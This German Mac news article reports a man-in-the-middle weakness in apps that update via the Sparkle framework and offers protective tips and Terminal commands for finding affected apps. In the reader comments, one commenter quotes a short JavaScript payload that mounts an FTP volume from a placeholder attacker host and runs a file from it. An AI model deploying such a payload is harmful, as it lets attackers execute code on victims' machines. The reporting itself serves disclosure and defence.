Video: Angreifer nutzen App-Updates für System-Infektion

Wie aus einer Videodemonstration hervorgeht, haben viele Mac-Apps mit integriertem Update-Mechanismus ein potenzielles Sicherheitsproblem, wenn sie hierbei auf das Sparkle-System setzen. Im Zusammenhang mit unverschlüsselten Verbindungen und der ungesicherten Darstellung der Update-Beschreibung mithilfe von WebKit lassen sich Schädlinge einschleusen. Dazu muss der Angreifer nur in einem öffentlichen Netzwerk mit Internet-Zugang wie beispielsweise in einem Café oder im Zug die Update-Server der jeweiligen App nach dem Man-in-the-Middle-Prinzip mit eigenen Servern überlagern, die dann schädliche Programme verteilen und ausführen.


Details
Einem Angreifer ist es so letztendlich möglich, das System samt aller Daten zu übernehmen und über das Internet fernzusteuern. Die Sicherheitsforscher zeigen anhand von VLC, µTorrent und Sequel Pro, dass der Angriff nicht nur rein theoretischer Natur ist. Die Entwickler von VLC haben bereits reagiert und ein entsprechendes Update veröffentlicht. Neben regelmäßigen Aktualisierungen aller Apps sollten aber Nutzer noch weitere Maßnahmen ergreifen, um einen derartigen Angriff zu vermeiden.

Wie man sich schützen kann
So empfiehlt es sich beispielsweise, nur über die eigene private Internet-Verbindung alle Updates herunterzuladen und zu installieren. Mögliche Automatismen bei der Update-Installation sollten in der jeweiligen App daher gegebenenfalls auch deaktiviert werden, um die ungewollte Installation über ein öffentliches Netzwerk zu verhindern.

Alternativ kann man auch von der Verwendung betroffener Apps in öffentlichen Netzwerken absehen, wenn noch kein aktuelles Update erschienen ist. Um eine Übersicht über alle Apps mit dem Sparkle-System zu erhalten, kann man den folgenden Terminal-Befehl verwenden:

find /Applications ~/Applications -name Sparkle.framework | sed 's,.*/Applications/\(.*\)\.app/.*,\1,'

Achtung: Gelistet werdet alle potenziell gefährdeten Apps. Ob diese tatsächlich eine Sicherheitslücke aufweisen, lässt sich aus der Liste nicht ermitteln. Entscheidend ist vielmehr, ob Apps ihre Update-Informationen über eine unverschlüsselte Verbindung beziehen.

Kommentare

gritsch10.02.16 11:16
Wenn ich mich recht erinnere, hat sparkle-framework früher mal (vor 5 jahren) doch nur funktioniert wenn man ENTWEDER https verwendet hat ODER die signaturprüfung aktiv hatet. Am besten war natürlich beides. Haben die entwickler der angegriffenen Apps das manuell deaktiviert oder wie wird die signaturprüfung vom angreifer umgangen?
gritsch10.02.16 11:18
Achso, grad gesehen dass das Problem übers App-Kit kommt.
gritsch10.02.16 11:28
window.location = "ftp://a:b@LOCAL_ADDRESS:2100/";
 window.setTimeout(function(){
   window.location = "file:///Volumes/LOCAL_ADDRESS/FILENAME";
 }, 2000 );

es mounted also ein volume und führt dann die entsprechende datei darauf aus.
funktioniert im übrigen auch aus dem Browser raus. dazu braucht es kein Sparkle
Dirk!10.02.16 11:58
Hiermit listet er die Versionsnummer auch auf: Versionen kleiner 1.13.1 sind wohl betroffen:

find /Applications -path '*Autoupdate.app/Contents/Info.plist' -exec echo {} \; -exec grep -A1 CFBundleShortVersionString '{}' \; | grep -v CFBundleShortVersionString
Duck Dodgers
Duck Dodgers10.02.16 12:00
@Dirk
Und NUR die Software, die bei Updates nicht auf https setzt!
The difference between men and boys is the price of the toys.
gritsch10.02.16 12:10
Duck Dodgers
@Dirk
Und NUR die Software, die bei Updates nicht auf https setzt!

korrekt. Außerdem finden die befehle nur programme im /Applications folder und auch nur relativ neue programme (In alten versionen gabs das "Autoupdate.app" nicht)...

Kommentieren

Sie müssen sich einloggen, um die News kommentieren zu können.

OK MacTechNews.de verwendet Cookies unter anderem für personalisierte Inhalte, Seitenanalyse und bei der Auslieferung von Google-Anzeigen. Dies war zwar schon immer so, auf Wunsch der EU muss nun jedoch explizit darauf hingewiesen werden. Durch Nutzung der Website erklären Sie sich damit einverstanden. Weitere Informationen